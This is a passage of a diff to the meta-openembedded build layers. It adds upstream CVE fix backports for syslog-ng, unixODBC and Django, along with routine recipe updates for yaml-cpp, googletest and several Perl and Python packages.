0) ++ else if (strncasecmp(*buf, "Jun", abbrev_length) == 0) + *mon = 5; +- else if (strncasecmp(*buf, "Jul", 3) == 0) ++ else if (strncasecmp(*buf, "Jul", abbrev_length) == 0) + *mon = 6; + else + return FALSE; + break; + case 'F': +- if (strncasecmp(*buf, "Feb", 3) == 0) ++ if (strncasecmp(*buf, "Feb", abbrev_length) == 0) + *mon = 1; + else + return FALSE; + break; + case 'M': +- if (strncasecmp(*buf, "Mar", 3) == 0) ++ if (strncasecmp(*buf, "Mar", abbrev_length) == 0) + *mon = 2; +- else if (strncasecmp(*buf, "May", 3) == 0) ++ else if (strncasecmp(*buf, "May", abbrev_length) == 0) + *mon = 4; + else + return FALSE; + break; + case 'A': +- if (strncasecmp(*buf, "Apr", 3) == 0) ++ if (strncasecmp(*buf, "Apr", abbrev_length) == 0) + *mon = 3; +- else if (strncasecmp(*buf, "Aug", 3) == 0) ++ else if (strncasecmp(*buf, "Aug", abbrev_length) == 0) + *mon = 7; + else + return FALSE; + break; + case 'S': +- if (strncasecmp(*buf, "Sep", 3) == 0) ++ if (strncasecmp(*buf, "Sep", abbrev_length) == 0) + *mon = 8; + else + return FALSE; + break; + case 'O': +- if (strncasecmp(*buf, "Oct", 3) == 0) ++ if (strncasecmp(*buf, "Oct", abbrev_length) == 0) + *mon = 9; + else + return FALSE; + break; + case 'N': +- if (strncasecmp(*buf, "Nov", 3) == 0) ++ if (strncasecmp(*buf, "Nov", abbrev_length) == 0) + *mon = 10; + else + return FALSE; + break; + case 'D': +- if (strncasecmp(*buf, "Dec", 3) == 0) ++ if (strncasecmp(*buf, "Dec", abbrev_length) == 0) + *mon = 11; + else + return FALSE; +@@ -152,8 +156,8 @@ scan_month_abbrev(const gchar **buf, gint *left, gint *mon) + return FALSE; + } + +- (*buf) += 3; +- (*left) -= 3; ++ (*buf) += abbrev_length; ++ (*left) -= abbrev_length; + return TRUE; + } + +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0007.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0007.patch new file mode 100644 index 0000000000..abb36fdf5f --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0007.patch @@ -0,0 +1,81 @@ +From 8c6e2c1c41b0fcc5fbd464c35f4dac7102235396 Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sat, 20 Aug 2022 14:30:22 +0200 +Subject: [PATCH 7/8] timeutils: fix invalid calculation of ISO timestamp length +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/8c6e2c1c41b0fcc5fbd464c35f4dac7102235396] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + lib/timeutils/scan-timestamp.c | 8 ++++++-- + lib/timeutils/tests/test_scan-timestamp.c | 7 +++++++ + 2 files changed, 13 insertions(+), 2 deletions(-) + +diff --git a/lib/timeutils/scan-timestamp.c b/lib/timeutils/scan-timestamp.c +index d22d50973..125264677 100644 +--- a/lib/timeutils/scan-timestamp.c ++++ b/lib/timeutils/scan-timestamp.c +@@ -350,19 +350,21 @@ __parse_usec(const guchar **data, gint *length) + static gboolean + __has_iso_timezone(const guchar *src, gint length) + { +- return (length >= 5) && ++ return (length >= 6) && + (*src == '+' || *src == '-') && + isdigit(*(src+1)) && + isdigit(*(src+2)) && + *(src+3) == ':' && + isdigit(*(src+4)) && + isdigit(*(src+5)) && +- !isdigit(*(src+6)); ++ (length < 7 || !isdigit(*(src+6))); + } + + static guint32 + __parse_iso_timezone(const guchar **data, gint *length) + { ++ g_assert(*length >= 6); ++ + gint hours, mins; + const guchar *src = *data; + guint32 tz = 0; +@@ -372,8 +374,10 @@ __parse_iso_timezone(const guchar **data, gint *length) + hours = (*(src + 1) - '0') * 10 + *(src + 2) - '0'; + mins = (*(src + 4) - '0') * 10 + *(src + 5) - '0'; + tz = sign * (hours * 3600 + mins * 60); ++ + src += 6; + (*length) -= 6; ++ + *data = src; + return tz; + } +diff --git a/lib/timeutils/tests/test_scan-timestamp.c b/lib/timeutils/tests/test_scan-timestamp.c +index 468bbf779..d18bdc65d 100644 +--- a/lib/timeutils/tests/test_scan-timestamp.c ++++ b/lib/timeutils/tests/test_scan-timestamp.c +@@ -264,6 +264,13 @@ Test(parse_timestamp, non_zero_terminated_rfc5424_input_is_handled_properly) + + } + ++Test(parse_timestamp, non_zero_terminated_rfc5424_timestamp_only) ++{ ++ const gchar *ts = "2022-08-17T05:02:28.417+03:00"; ++ gint ts_len = strlen(ts); ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len, ts); ++} ++ + + Test(parse_timestamp, daylight_saving_behavior_at_spring_with_explicit_timezones) + { +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0008.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0008.patch new file mode 100644 index 0000000000..56c71e8a21 --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0008.patch @@ -0,0 +1,45 @@ +From 56f881c5eaa3d8c02c96607c4b9e4eaf959a044d Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sat, 20 Aug 2022 14:30:51 +0200 +Subject: [PATCH 8/8/] timeutils: fix out-of-bounds reading of data buffer +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/56f881c5eaa3d8c02c96607c4b9e4eaf959a044d] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + lib/timeutils/scan-timestamp.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/lib/timeutils/scan-timestamp.c b/lib/timeutils/scan-timestamp.c +index 125264677..c00d8e6a9 100644 +--- a/lib/timeutils/scan-timestamp.c ++++ b/lib/timeutils/scan-timestamp.c +@@ -431,7 +431,7 @@ __parse_bsd_timestamp(const guchar **data, gint *length, WallClockTime *wct) + if (!scan_pix_timestamp((const gchar **) &src, &left, wct)) + return FALSE; + +- if (*src == ':') ++ if (left && *src == ':') + { + src++; + left--; +@@ -482,7 +482,7 @@ scan_rfc3164_timestamp(const guchar **data, gint *length, WallClockTime *wct) + * looking at you, skip that as well, so we can reliably detect IPv6 + * addresses as hostnames, which would be using ":" as well. */ + +- if (*src == ':') ++ if (left && *src == ':') + { + ++src; + --left; +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/syslog-ng_3.36.1.bb b/meta-oe/recipes-support/syslog-ng/syslog-ng_3.36.1.bb index 40bbfe495a..045b9b71c9 100644 --- a/meta-oe/recipes-support/syslog-ng/syslog-ng_3.36.1.bb +++ b/meta-oe/recipes-support/syslog-ng/syslog-ng_3.36.1.bb @@ -22,6 +22,14 @@ SRC_URI = "https://github.com/balabit/syslog-ng/releases/download/${BP}/${BP}.ta file://volatiles.03_syslog-ng \ file://syslog-ng-tmp.conf \ file://syslog-ng.service-the-syslog-ng-service.patch \ + file://CVE-2022-38725-0001.patch \ + file://CVE-2022-38725-0002.patch \ + file://CVE-2022-38725-0003.patch \ + file://CVE-2022-38725-0004.patch \ + file://CVE-2022-38725-0005.patch \ + file://CVE-2022-38725-0006.patch \ + file://CVE-2022-38725-0007.patch \ + file://CVE-2022-38725-0008.patch \ " SRC_URI[sha256sum] = "90a25c9767fe749db50f118ddfc92ec71399763d2ecd5ad4f11ff5eea049e60b" diff --git a/meta-oe/recipes-support/unixodbc/files/CVE-2024-1013.patch b/meta-oe/recipes-support/unixodbc/files/CVE-2024-1013.patch new file mode 100644 index 0000000000..7d37ad6042 --- /dev/null +++ b/meta-oe/recipes-support/unixodbc/files/CVE-2024-1013.patch @@ -0,0 +1,53 @@ +From 45f501e1be2db6b017cc242c79bfb9de32b332a1 Mon Sep 17 00:00:00 2001 +From: Florian Weimer <fweimer@redhat.com> +Date: Mon, 29 Jan 2024 08:27:29 +0100 +Subject: [PATCH] PostgreSQL driver: Fix incompatible pointer-to-integer types + +These result in out-of-bounds stack writes on 64-bit architectures +(caller has 4 bytes, callee writes 8 bytes), and seem to have gone +unnoticed on little-endian architectures (although big-endian +architectures must be broken). + +This change is required to avoid a build failure with GCC 14. + +CVE: CVE-2024-1013 + +Upstream-Status: Backport [https://github.com/lurcher/unixODBC/commit/45f501e1be2db6b017cc242c79bfb9de32b332a1] + +Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com> +--- + Drivers/Postgre7.1/info.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/Drivers/Postgre7.1/info.c b/Drivers/Postgre7.1/info.c +index 63ac91f..2216ecd 100755 +--- a/Drivers/Postgre7.1/info.c ++++ b/Drivers/Postgre7.1/info.c +@@ -1779,14 +1779,14 @@ char *table_name; + char index_name[MAX_INFO_STRING]; + short fields_vector[8]; + char isunique[10], isclustered[10]; +-SDWORD index_name_len, fields_vector_len; ++SQLLEN index_name_len, fields_vector_len; + TupleNode *row; + int i; + HSTMT hcol_stmt; + StatementClass *col_stmt, *indx_stmt; + char column_name[MAX_INFO_STRING], relhasrules[MAX_INFO_STRING]; + char **column_names = 0; +-Int4 column_name_len; ++SQLLEN column_name_len; + int total_columns = 0; + char error = TRUE; + ConnInfo *ci; +@@ -2136,7 +2136,7 @@ HSTMT htbl_stmt; + StatementClass *tbl_stmt; + char tables_query[STD_STATEMENT_LEN]; + char attname[MAX_INFO_STRING]; +-SDWORD attname_len; ++SQLLEN attname_len; + char pktab[MAX_TABLE_LEN + 1]; + Int2 result_cols; + +-- +2.40.0 diff --git a/meta-oe/recipes-support/unixodbc/unixodbc_2.3.9.bb b/meta-oe/recipes-support/unixodbc/unixodbc_2.3.9.bb index c194739cb1..283546cf0e 100644 --- a/meta-oe/recipes-support/unixodbc/unixodbc_2.3.9.bb +++ b/meta-oe/recipes-support/unixodbc/unixodbc_2.3.9.bb @@ -10,6 +10,7 @@ DEPENDS = "libtool readline" SRC_URI = "http://ftp.unixodbc.org/unixODBC-${PV}.tar.gz \ file://do-not-use-libltdl-source-directory.patch \ + file://CVE-2024-1013.patch \ " SRC_URI[sha256sum] = "52833eac3d681c8b0c9a5a65f2ebd745b3a964f208fc748f977e44015a31b207" diff --git a/meta-oe/recipes-support/yaml-cpp/yaml-cpp/0001-Fix-CMake-export-files-1077.patch b/meta-oe/recipes-support/yaml-cpp/yaml-cpp/0001-Fix-CMake-export-files-1077.patch new file mode 100644 index 0000000000..b6c4a3b883 --- /dev/null +++ b/meta-oe/recipes-support/yaml-cpp/yaml-cpp/0001-Fix-CMake-export-files-1077.patch @@ -0,0 +1,117 @@ +From 3d436f6cfc2dfe52fc1533c01f57c25ae7ffac9c Mon Sep 17 00:00:00 2001 +From: Felix Schwitzer <flx107809@gmail.com> +Date: Fri, 1 Apr 2022 05:26:47 +0200 +Subject: [PATCH] Fix CMake export files (#1077) + +After configuring the file `yaml-cpp-config.cmake.in`, the result ends up with +empty variables. (see also the discussion in #774). + +Rework this file and the call to `configure_package_config_file` according the +cmake documentation +(https://cmake.org/cmake/help/v3.22/module/CMakePackageConfigHelpers.html?highlight=configure_package_config#command:configure_package_config_file) +to overcome this issue and allow a simple `find_package` after install. + +As there was some discussion about the place where to install the +`yaml-cpp-config.cmake` file, e.g. #1055, factor out the install location into +an extra variable to make it easier changing this location in the future. + +Also untabify CMakeLists.txt in some places to align with the other code parts in this file. + +Upstream-Status: Accepted [https://github.com/jbeder/yaml-cpp/pull/1077] + +Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu> +--- + CMakeLists.txt | 29 ++++++++++++++++++----------- + yaml-cpp-config.cmake.in | 10 ++++++---- + 2 files changed, 24 insertions(+), 15 deletions(-) + +diff --git a/CMakeLists.txt b/CMakeLists.txt +index b230b9e..983d1a4 100644 +--- a/CMakeLists.txt ++++ b/CMakeLists.txt +@@ -127,10 +127,16 @@ set_target_properties(yaml-cpp PROPERTIES + PROJECT_LABEL "yaml-cpp ${yaml-cpp-label-postfix}" + DEBUG_POSTFIX "${CMAKE_DEBUG_POSTFIX}") + ++# FIXME(felix2012): A more common place for the cmake export would be ++# `CMAKE_INSTALL_LIBDIR`, as e.g. done in ubuntu or in this project for GTest ++set(CONFIG_EXPORT_DIR "${CMAKE_INSTALL_DATADIR}/cmake/yaml-cpp") ++set(EXPORT_TARGETS yaml-cpp) + configure_package_config_file( + "${PROJECT_SOURCE_DIR}/yaml-cpp-config.cmake.in" + "${PROJECT_BINARY_DIR}/yaml-cpp-config.cmake" +- INSTALL_DESTINATION "${CMAKE_INSTALL_DATADIR}/cmake/yaml-cpp") ++ INSTALL_DESTINATION "${CONFIG_EXPORT_DIR}" ++ PATH_VARS CMAKE_INSTALL_INCLUDEDIR CONFIG_EXPORT_DIR) ++unset(EXPORT_TARGETS) + + write_basic_package_version_file( + "${PROJECT_BINARY_DIR}/yaml-cpp-config-version.cmake" +@@ -139,30 +145,31 @@ write_basic_package_version_file( + configure_file(yaml-cpp.pc.in yaml-cpp.pc @ONLY) + + if (YAML_CPP_INSTALL) +- install(TARGETS yaml-cpp ++ install(TARGETS yaml-cpp + EXPORT yaml-cpp-targets + RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR} + LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR} + ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR}) +- install(DIRECTORY ${PROJECT_SOURCE_DIR}/include/ ++ install(DIRECTORY ${PROJECT_SOURCE_DIR}/include/ + DESTINATION ${CMAKE_INSTALL_INCLUDEDIR} +- FILES_MATCHING PATTERN "*.h") ++ FILES_MATCHING PATTERN "*.h") + install(EXPORT yaml-cpp-targets +- DESTINATION "${CMAKE_INSTALL_DATADIR}/cmake/yaml-cpp") +- install(FILES +- "${PROJECT_BINARY_DIR}/yaml-cpp-config.cmake" +- "${PROJECT_BINARY_DIR}/yaml-cpp-config-version.cmake" +- DESTINATION "${CMAKE_INSTALL_DATADIR}/cmake/yaml-cpp") ++ DESTINATION "${CONFIG_EXPORT_DIR}") ++ install(FILES ++ "${PROJECT_BINARY_DIR}/yaml-cpp-config.cmake" ++ "${PROJECT_BINARY_DIR}/yaml-cpp-config-version.cmake" ++ DESTINATION "${CONFIG_EXPORT_DIR}") + install(FILES "${PROJECT_BINARY_DIR}/yaml-cpp.pc" + DESTINATION ${CMAKE_INSTALL_DATADIR}/pkgconfig) + endif() ++unset(CONFIG_EXPORT_DIR) + + if(YAML_CPP_BUILD_TESTS) +- add_subdirectory(test) ++ add_subdirectory(test) + endif() + + if(YAML_CPP_BUILD_TOOLS) +- add_subdirectory(util) ++ add_subdirectory(util) + endif() + + if (YAML_CPP_CLANG_FORMAT_EXE) +diff --git a/yaml-cpp-config.cmake.in b/yaml-cpp-config.cmake.in +index 7b41e3f..a7ace3d 100644 +--- a/yaml-cpp-config.cmake.in ++++ b/yaml-cpp-config.cmake.in +@@ -3,12 +3,14 @@ + # YAML_CPP_INCLUDE_DIR - include directory + # YAML_CPP_LIBRARIES - libraries to link against + +-# Compute paths +-get_filename_component(YAML_CPP_CMAKE_DIR "${CMAKE_CURRENT_LIST_FILE}" PATH) +-set(YAML_CPP_INCLUDE_DIR "@CONFIG_INCLUDE_DIRS@") ++@PACKAGE_INIT@ ++ ++set_and_check(YAML_CPP_INCLUDE_DIR "@PACKAGE_CMAKE_INSTALL_INCLUDEDIR@") + + # Our library dependencies (contains definitions for IMPORTED targets) +-include("${YAML_CPP_CMAKE_DIR}/yaml-cpp-targets.cmake") ++include(@PACKAGE_CONFIG_EXPORT_DIR@/yaml-cpp-targets.cmake) + + # These are IMPORTED targets created by yaml-cpp-targets.cmake + set(YAML_CPP_LIBRARIES "@EXPORT_TARGETS@") ++ ++check_required_components(@EXPORT_TARGETS@) +-- +2.39.2 + diff --git a/meta-oe/recipes-support/yaml-cpp/yaml-cpp_0.7.0.bb b/meta-oe/recipes-support/yaml-cpp/yaml-cpp_0.7.0.bb index d3984abe8b..e04d4705a4 100644 --- a/meta-oe/recipes-support/yaml-cpp/yaml-cpp_0.7.0.bb +++ b/meta-oe/recipes-support/yaml-cpp/yaml-cpp_0.7.0.bb @@ -8,6 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=6a8aaf0595c2efc1a9c2e0913e9c1a2c" # yaml-cpp releases are stored as archive files in github. # download the exact revision of release SRC_URI = "git://github.com/jbeder/yaml-cpp.git;branch=master;protocol=https" +SRC_URI += "file://0001-Fix-CMake-export-files-1077.patch" SRCREV = "0579ae3d976091d7d664aa9d2527e0d0cff25763" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-test/googletest/files/0001-work-around-GCC-6-11-ADL-bug.patch b/meta-oe/recipes-test/googletest/files/0001-work-around-GCC-6-11-ADL-bug.patch new file mode 100644 index 0000000000..c2828e6a94 --- /dev/null +++ b/meta-oe/recipes-test/googletest/files/0001-work-around-GCC-6-11-ADL-bug.patch @@ -0,0 +1,42 @@ +From 8c70e2680bec526012d96578160901e4c24e1c48 Mon Sep 17 00:00:00 2001 +From: Paul Groke <paul.groke@dynatrace.com> +Date: Thu, 15 Sep 2022 13:36:49 +0200 +Subject: [PATCH] work around GCC 6~11 ADL bug + +see https://gcc.gnu.org/bugzilla/show_bug.cgi?id=51577 +ADL seems to work properly when we do the SFINAE check via the return type, but not when using a dummy template parameter + +fix #3992 +Upstream-Status: Backport [https://github.com/google/googletest/pull/3993/commits/096014a45dc38dff993f5b7bb28a258d8323344b] +Signed-off-by: Paul Groke <paul.groke@dynatrace.com> +Signed-off-by: Sana Kazi <sana.kazi@kpit.com> +--- + googletest/include/gtest/gtest-printers.h | 13 +++++++------ + 1 file changed, 7 insertions(+), 6 deletions(-) + +diff --git a/googletest/include/gtest/gtest-printers.h b/googletest/include/gtest/gtest-printers.h +index 8e4d295344..19c3e0b69b 100644 +--- a/googletest/include/gtest/gtest-printers.h ++++ b/googletest/include/gtest/gtest-printers.h +@@ -205,12 +205,13 @@ struct StreamPrinter { + // Don't accept member pointers here. We'd print them via implicit + // conversion to bool, which isn't useful. + typename = typename std::enable_if< +- !std::is_member_pointer<T>::value>::type, +- // Only accept types for which we can find a streaming operator via +- // ADL (possibly involving implicit conversions). +- typename = decltype(std::declval<std::ostream&>() +- << std::declval<const T&>())> +- static void PrintValue(const T& value, ::std::ostream* os) { ++ !std::is_member_pointer<T>::value>::type> ++ // Only accept types for which we can find a streaming operator via ++ // ADL (possibly involving implicit conversions). ++ // (Use SFINAE via return type, because it seems GCC < 12 doesn't handle name ++ // lookup properly when we do it in the template parameter list.) ++ static auto PrintValue(const T& value, ::std::ostream* os) ++ -> decltype((void)(*os << value)) { + // Call streaming operator found by ADL, possibly with implicit conversions + // of the arguments. + *os << value; +-- +2.25.1 diff --git a/meta-oe/recipes-test/googletest/googletest_git.bb b/meta-oe/recipes-test/googletest/googletest_git.bb index 869c2c86b6..917a68e95b 100644 --- a/meta-oe/recipes-test/googletest/googletest_git.bb +++ b/meta-oe/recipes-test/googletest/googletest_git.bb @@ -10,7 +10,8 @@ PROVIDES += "gmock gtest" S = "${WORKDIR}/git" SRCREV = "9e712372214d75bb30ec2847a44bf124d48096f3" -SRC_URI = "git://github.com/google/googletest.git;branch=main;protocol=https" +SRC_URI = "git://github.com/google/googletest.git;branch=main;protocol=https \ + file://0001-work-around-GCC-6-11-ADL-bug.patch " inherit cmake diff --git a/meta-perl/recipes-perl/libconfig/libconfig-autoconf-perl_0.319.bb b/meta-perl/recipes-perl/libconfig/libconfig-autoconf-perl_0.319.bb index 5db0bb4269..5c3701f16b 100644 --- a/meta-perl/recipes-perl/libconfig/libconfig-autoconf-perl_0.319.bb +++ b/meta-perl/recipes-perl/libconfig/libconfig-autoconf-perl_0.319.bb @@ -38,4 +38,4 @@ S = "${WORKDIR}/Config-AutoConf-${PV}" inherit cpan ptest-perl -BBCLASSEXTEND = "native nativesdk" +BBCLASSEXTEND = "native" diff --git a/meta-perl/recipes-perl/libcrypt/files/0001-Fix-for-Issue-31.patch b/meta-perl/recipes-perl/libcrypt/files/0001-Fix-for-Issue-31.patch deleted file mode 100644 index a5ea43f88b..0000000000 --- a/meta-perl/recipes-perl/libcrypt/files/0001-Fix-for-Issue-31.patch +++ /dev/null @@ -1,37 +0,0 @@ -From 5e8202458e41ba1f7801746c503fe7c60ae340d5 Mon Sep 17 00:00:00 2001 -From: kambe-mikb <77083885+kambe-mikb@users.noreply.github.com> -Date: Tue, 28 Sep 2021 17:40:18 +1000 -Subject: [PATCH] Fix for Issue 31 - -Fix Issue 31 by removing reference to RSA_SSLV23_PADDING (removed from OpenSSL starting from v3.0.0) - -Upstream-Status: Submitted [https://github.com/toddr/Crypt-OpenSSL-RSA/pull/32] -Signed-off-by: Khem Raj <raj.khem@gmail.com> ---- - RSA.xs | 4 ++++ - 1 file changed, 4 insertions(+) - -diff --git a/RSA.xs b/RSA.xs -index 46cb199..4f65dfc 100644 ---- a/RSA.xs -+++ b/RSA.xs -@@ -640,12 +640,16 @@ use_pkcs1_oaep_padding(p_rsa) - CODE: - p_rsa->padding = RSA_PKCS1_OAEP_PADDING; - -+#if OPENSSL_VERSION_NUMBER < 0x30000000L -+ - void - use_sslv23_padding(p_rsa) - rsaData* p_rsa; - CODE: - p_rsa->padding = RSA_SSLV23_PADDING; - -+#endif -+ - # Sign text. Returns the signature. - - SV* --- -2.33.1 - diff --git a/meta-perl/recipes-perl/libcrypt/libcrypt-openssl-rsa-perl_0.32.bb b/meta-perl/recipes-perl/libcrypt/libcrypt-openssl-rsa-perl_0.33.bb index fd92c8a8db..aa8d138f2c 100644 --- a/meta-perl/recipes-perl/libcrypt/libcrypt-openssl-rsa-perl_0.32.bb +++ b/meta-perl/recipes-perl/libcrypt/libcrypt-openssl-rsa-perl_0.33.bb @@ -4,10 +4,9 @@ LICENSE = "Artistic-1.0 | GPL-1.0-or-later" LIC_FILES_CHKSUM = "file://LICENSE;md5=a67ceecc5d9a91a5a0d003ba50c26346" SRC_URI = "http://www.cpan.org/modules/by-module/Crypt/Crypt-OpenSSL-RSA-${PV}.tar.gz \ - file://0001-Fix-for-Issue-31.patch \ " -SRC_URI[sha256sum] = "adc74f0ae125c77f65d5dd32abb9c3429300a79543bf263494f333f9c0b62a61" +SRC_URI[sha256sum] = "bdbe630f6d6f540325746ad99977272ac8664ff81bd19f0adaba6d6f45efd864" DEPENDS += "libcrypt-openssl-guess-perl-native openssl" diff --git a/meta-perl/recipes-perl/libio/libio-socket-ssl-perl_2.074.bb b/meta-perl/recipes-perl/libio/libio-socket-ssl-perl_2.074.bb index 6249fd1d78..6e04e40dcf 100644 --- a/meta-perl/recipes-perl/libio/libio-socket-ssl-perl_2.074.bb +++ b/meta-perl/recipes-perl/libio/libio-socket-ssl-perl_2.074.bb @@ -42,5 +42,3 @@ do_install_ptest () { cp -r ${B}/t ${D}${PTEST_PATH} cp -r ${B}/certs ${D}${PTEST_PATH} } - -BBCLASSEXTEND = "native" diff --git a/meta-perl/recipes-perl/libnet/libnet-dns-perl_1.33.bb b/meta-perl/recipes-perl/libnet/libnet-dns-perl_1.33.bb index 2c7d793a7b..c768d64e32 100644 --- a/meta-perl/recipes-perl/libnet/libnet-dns-perl_1.33.bb +++ b/meta-perl/recipes-perl/libnet/libnet-dns-perl_1.33.bb @@ -61,5 +61,3 @@ python __anonymous () { raise bb.parse.SkipRecipe("incompatible with %s C library" % d.getVar('TCLIBC')) } - -BBCLASSEXTEND = "native" diff --git a/meta-perl/recipes-perl/libnet/libnet-ldap-perl_0.68.bb b/meta-perl/recipes-perl/libnet/libnet-ldap-perl_0.68.bb index dcc5ea88b1..a77381dce8 100644 --- a/meta-perl/recipes-perl/libnet/libnet-ldap-perl_0.68.bb +++ b/meta-perl/recipes-perl/libnet/libnet-ldap-perl_0.68.bb @@ -41,5 +41,3 @@ RDEPENDS:${PN}-ptest += " \ perl-module-perlio \ perl-module-test-more \ " - -BBCLASSEXTEND = "native" diff --git a/meta-perl/recipes-perl/libstatgrab/libunix-statgrab_0.112.bb b/meta-perl/recipes-perl/libstatgrab/libunix-statgrab_0.112.bb index c568ade997..01261d547a 100644 --- a/meta-perl/recipes-perl/libstatgrab/libunix-statgrab_0.112.bb +++ b/meta-perl/recipes-perl/libstatgrab/libunix-statgrab_0.112.bb @@ -36,5 +36,3 @@ S = "${WORKDIR}/Unix-Statgrab-${PV}" export LD = "${CCLD}" inherit cpan pkgconfig ptest-perl - -BBCLASSEXTEND = "native" diff --git a/meta-python/recipes-devtools/python/python3-aiohttp-jinja2_1.5.bb b/meta-python/recipes-devtools/python/python3-aiohttp-jinja2_1.5.bb index c86ec092a6..871eb7cae9 100644 --- a/meta-python/recipes-devtools/python/python3-aiohttp-jinja2_1.5.bb +++ b/meta-python/recipes-devtools/python/python3-aiohttp-jinja2_1.5.bb @@ -11,5 +11,3 @@ RDEPENDS:${PN} += " \ ${PYTHON_PN}-jinja2 \ ${PYTHON_PN}-aiohttp \ " - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-python/recipes-devtools/python/python3-aiohttp_3.8.1.bb b/meta-python/recipes-devtools/python/python3-aiohttp_3.8.6.bb index f2b8d52a72..f8ca9a4739 100644 --- a/meta-python/recipes-devtools/python/python3-aiohttp_3.8.1.bb +++ b/meta-python/recipes-devtools/python/python3-aiohttp_3.8.6.bb @@ -2,9 +2,9 @@ SUMMARY = "Async http client/server framework" DESCRIPTION = "Asynchronous HTTP client/server framework for asyncio and Python" HOMEPAGE = "https://github.com/aio-libs/aiohttp" LICENSE = "Apache-2.0" -LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=8074d6c6e217873b2a018a4522243ea3" +LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=748073912af33aa59430d3702aa32d41" -SRC_URI[sha256sum] = "fc5471e1a54de15ef71c1bc6ebe80d4dc681ea600e68bfd1cbce40427f0b7578" +SRC_URI[sha256sum] = "b0cf2a4501bff9330a8a5248b4ce951851e415bdcce9dc158e76cfd55e15085c" PYPI_PACKAGE = "aiohttp" inherit python_setuptools_build_meta pypi diff --git a/meta-python/recipes-devtools/python/python3-autobahn_22.3.2.bb b/meta-python/recipes-devtools/python/python3-autobahn_22.3.2.bb index 78514a412f..afb798bd71 100644 --- a/meta-python/recipes-devtools/python/python3-autobahn_22.3.2.bb +++ b/meta-python/recipes-devtools/python/python3-autobahn_22.3.2.bb @@ -19,5 +19,3 @@ RDEPENDS:${PN} += " \ ${PYTHON_PN}-txaio \ ${PYTHON_PN}-six \ " - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-python/recipes-devtools/python/python3-can_4.0.0.bb b/meta-python/recipes-devtools/python/python3-can_4.0.0.bb index 2cd2e624b9..79aa3e19ec 100644 --- a/meta-python/recipes-devtools/python/python3-can_4.0.0.bb +++ b/meta-python/recipes-devtools/python/python3-can_4.0.0.bb @@ -11,16 +11,19 @@ inherit pypi setuptools3 RDEPENDS:${PN}:class-target += "\ ${PYTHON_PN}-aenum \ - ${PYTHON_PN}-ctypes \ ${PYTHON_PN}-codecs \ ${PYTHON_PN}-compression \ + ${PYTHON_PN}-ctypes \ ${PYTHON_PN}-fcntl \ ${PYTHON_PN}-logging \ ${PYTHON_PN}-misc \ ${PYTHON_PN}-netserver \ + ${PYTHON_PN}-packaging \ + ${PYTHON_PN}-pkg-resources \ + ${PYTHON_PN}-setuptools \ ${PYTHON_PN}-sqlite3 \ + ${PYTHON_PN}-typing-extensions \ ${PYTHON_PN}-wrapt \ - ${PYTHON_PN}-pkg-resources \ " BBCLASSEXTEND = "native nativesdk" diff --git a/meta-python/recipes-devtools/python/python3-django/CVE-2023-31047.patch b/meta-python/recipes-devtools/python/python3-django/CVE-2023-31047.patch new file mode 100644 index 0000000000..ab29a2ed97 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-django/CVE-2023-31047.patch @@ -0,0 +1,352 @@ +From fd3215dec5d50aa1f09cb1f8eba193524e7379f3 Mon Sep 17 00:00:00 2001 +From: Mariusz Felisiak <felisiak.mariusz@gmail.com> +Date: Thu, 25 May 2023 14:49:15 +0000 +Subject: [PATCH] Fixed CVE-2023-31047, Fixed #31710 + +-- Prevented potential bypass of validation when uploading multiple files using one form field. + +Thanks Moataz Al-Sharida and nawaik for reports. + +Co-authored-by: Shai Berger <shai@platonix.com> +Co-authored-by: nessita <124304+nessita@users.noreply.github.com> + +CVE: CVE-2023-31047 + +Upstream-Status: Backport [https://github.com/django/django/commit/fb4c55d9ec4bb812a7fb91fa20510d91645e411b] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + django/forms/widgets.py | 26 ++++++- + docs/releases/2.2.28.txt | 18 +++++ + docs/topics/http/file-uploads.txt | 65 ++++++++++++++++-- + .../forms_tests/field_tests/test_filefield.py | 68 ++++++++++++++++++- + .../widget_tests/test_clearablefileinput.py | 5 ++ + .../widget_tests/test_fileinput.py | 44 ++++++++++++ + 6 files changed, 218 insertions(+), 8 deletions(-) + +diff --git a/django/forms/widgets.py b/django/forms/widgets.py +index e37036c..d0cc131 100644 +--- a/django/forms/widgets.py ++++ b/django/forms/widgets.py +@@ -372,17 +372,41 @@ class MultipleHiddenInput(HiddenInput): + + + class FileInput(Input): ++ allow_multiple_selected = False + input_type = 'file' + needs_multipart_form = True + template_name = 